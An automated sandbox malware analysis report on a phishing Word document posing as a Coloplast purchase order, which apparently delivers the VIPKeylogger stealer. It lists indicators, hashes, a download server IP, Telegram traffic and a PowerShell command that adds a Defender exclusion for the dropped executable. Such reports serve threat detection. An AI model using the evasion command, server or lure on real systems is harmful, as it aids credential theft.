Malware Analysis Report

2024-11-15 07:58

Sample ID 241023-p5vl2ashlq
Target Purchase order Coloplast AS RFQ 10059170.docx
SHA256 6e53e98fc01dd05fd91f377afadd8b75a6396958986ea211d879a4e3c713f323
Tags
vipkeylogger collection discovery execution keylogger spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6e53e98fc01dd05fd91f377afadd8b75a6396958986ea211d879a4e3c713f323

Threat Level: Known bad

The file Purchase order Coloplast AS RFQ 10059170.docx was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection discovery execution keylogger spyware stealer

VIPKeylogger

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Reads user/profile data of local email clients

Abuses OpenXML format to download file from external location

Reads user/profile data of web browsers

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of AdjustPrivilegeToken

outlook_office_path

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

outlook_win_path

Uses Volume Shadow Copy service COM API

Launches Equation Editor

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-23 12:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-23 12:55

Reported

2024-10-23 12:57

Platform

win7-20240903-en

Max time kernel

128s

Max time network

130s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1492 set thread context of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 1492 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2736 wrote to memory of 1492 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2736 wrote to memory of 1492 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2736 wrote to memory of 1492 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 2128 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2128 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2128 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2128 wrote to memory of 1276 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1492 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe
PID 1492 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

"C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe"

C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

"C:\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe"

Network

Country Destination Domain Proto
DE 87.120.84.38:80 87.120.84.38 tcp
DE 87.120.84.38:80 87.120.84.38 tcp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

memory/2128-0-0x000000002F121000-0x000000002F122000-memory.dmp

memory/2128-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2128-2-0x0000000070C5D000-0x0000000070C68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{A0F871E2-ED0D-4456-902F-D76E3C293698}

MD5 b4b63c3d8aee40e40a2590f969eb9104
SHA1 e5c53f599aa20ff84b1c8d1c9e693d8568847722
SHA256 ba3e5df7facf028a175b0684c26190fcc602e5c70b3bf58652595ae3c005c3e7
SHA512 499d11f83f1ea3c0c14ddcd8349eff67c72355052e69198f2054189de73f619d7590910aa4de680d896bbf6ac3d7df3160decfa5226b863683bc49bf2c0d56ef

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9F453FF1-95CF-4AC1-B432-A4C0D643512C}.FSD

MD5 d32dab83738f60a2537081c1419f8b0c
SHA1 ec99280f64e892b3cccff9f397d915fba408ec34
SHA256 234be0a2a7fd98e5709dcf41bdfe6ffa527ba54ce7136fa531dae1352bff4b59
SHA512 abca84f081f9a3166a4259f43b3b9e1f1fa32b7f0dc1471e9b4190823c7e48e603ad796aac49dcb99fb8824f72084dd51d482da1ad4f65434b188e1d121c5bc5

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 d42e113fb400b7a045f1ed527f2a1a99
SHA1 d53fcfc249bac2d315764437bdcc2b247c067b3c
SHA256 85f8a2209d21dcc151411c85131bc34bba1ec12ac38817cde8f343722b1504f8
SHA512 b1a680fbe65e83d52f25adb8bbd61e0c6b2b7b808caa4bf3fcceda2c0dd1f35034fb837bd455e5127cfc728551bd3a00195ef4f61e1c6a8edf2cbcddea685717

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\1SccExdhYCwi9NS[1].doc

MD5 cb3af2d8ca17af3ac5f9522f114236a3
SHA1 b113356582cf12ea715873bcdbeddc2e0e4fe96b
SHA256 0afff6f8e9f46c3b8306e86b4fc5f6951d6cb6fc7a3d0021ac4bbb0479af3efd
SHA512 ee3bc7e1f5b85aaf7286bf90189de6d44ad6ac1a8aeee72600b83a54ecd53977d9166ce0ec90c13b61608d5d790e2fe88d05d093003076bf9413c74fb9f1f45b

\Users\Admin\AppData\Roaming\axdcfydonstan89660.exe

MD5 a4f12b1e186febfa71ae912ee06b924b
SHA1 8d51c1f9a3b814bc30366678d6d3eb75ec8e9303
SHA256 259403bd5fd2ed0dc8744a5444dd16c3595feaa977bd507d1966e26b664ba282
SHA512 43785a06f8a09d7ea796f9c1caedff969d4343ab5be7c0d596f9f0f81b55f43f7fc16ea72321a4d36cce191c395c355187fb585eed6a2d17d3239170fbb24504

memory/1492-94-0x0000000000E60000-0x0000000000F2C000-memory.dmp

memory/1492-95-0x0000000000460000-0x000000000047E000-memory.dmp

memory/2128-97-0x0000000070C5D000-0x0000000070C68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/1492-104-0x0000000000B80000-0x0000000000C0A000-memory.dmp

memory/2244-118-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-116-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-114-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2244-111-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-109-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-107-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2244-105-0x0000000000400000-0x0000000000448000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-23 12:55

Reported

2024-10-23 12:57

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase order Coloplast AS RFQ 10059170.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
DE 87.120.84.38:80 87.120.84.38 tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 38.84.120.87.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.27.146:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
GB 2.18.190.133:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 146.27.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp

Files

memory/4496-2-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-0-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-3-0x00007FFFA928D000-0x00007FFFA928E000-memory.dmp

memory/4496-1-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-6-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-5-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-4-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-7-0x00007FFF69270000-0x00007FFF69280000-memory.dmp

memory/4496-10-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-12-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-11-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-9-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-8-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-13-0x00007FFF66910000-0x00007FFF66920000-memory.dmp

memory/4496-14-0x00007FFF66910000-0x00007FFF66920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VKYZDMA5\1SccExdhYCwi9NS[1].doc

MD5 cb3af2d8ca17af3ac5f9522f114236a3
SHA1 b113356582cf12ea715873bcdbeddc2e0e4fe96b
SHA256 0afff6f8e9f46c3b8306e86b4fc5f6951d6cb6fc7a3d0021ac4bbb0479af3efd
SHA512 ee3bc7e1f5b85aaf7286bf90189de6d44ad6ac1a8aeee72600b83a54ecd53977d9166ce0ec90c13b61608d5d790e2fe88d05d093003076bf9413c74fb9f1f45b

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 df46d0a65fc3240d44173d3432cf97aa
SHA1 3e409dab0e8adb2a26a0b1f7cab9d86c70840406
SHA256 1449db034c4d17d63a7348fc6088ca030c7eeddae5942a460fed2e5cfdd76954
SHA512 6f11eda33f6130b39867b5f102131523c3d7bd8d5c89c18492c87f15b17793b434f08bae45f6beb8bc750632c88f55f88ee60b34f2ab0675e4a73a6bab197db5

memory/4496-65-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-64-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-63-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-62-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-61-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-60-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-66-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-72-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-73-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-71-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-70-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-69-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-68-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

memory/4496-67-0x00007FFFA91F0000-0x00007FFFA93E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 298353ea13bd9f55557ac57f71e798c7
SHA1 d816ce0c4d73891897b620ec11cd3795340dbf5b
SHA256 714457b35085457cde456efb2430ed9663a2207fb93f568e56be6571deffaefd
SHA512 293eac14644a1a7fd21905514c3933458c545de4f65dd7a01633b0c926335470770eef13d21078248cec63cc4bc41bf02aa3c34315097a03a066022198799f9e

C:\Users\Admin\AppData\Local\Temp\TCD4701.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84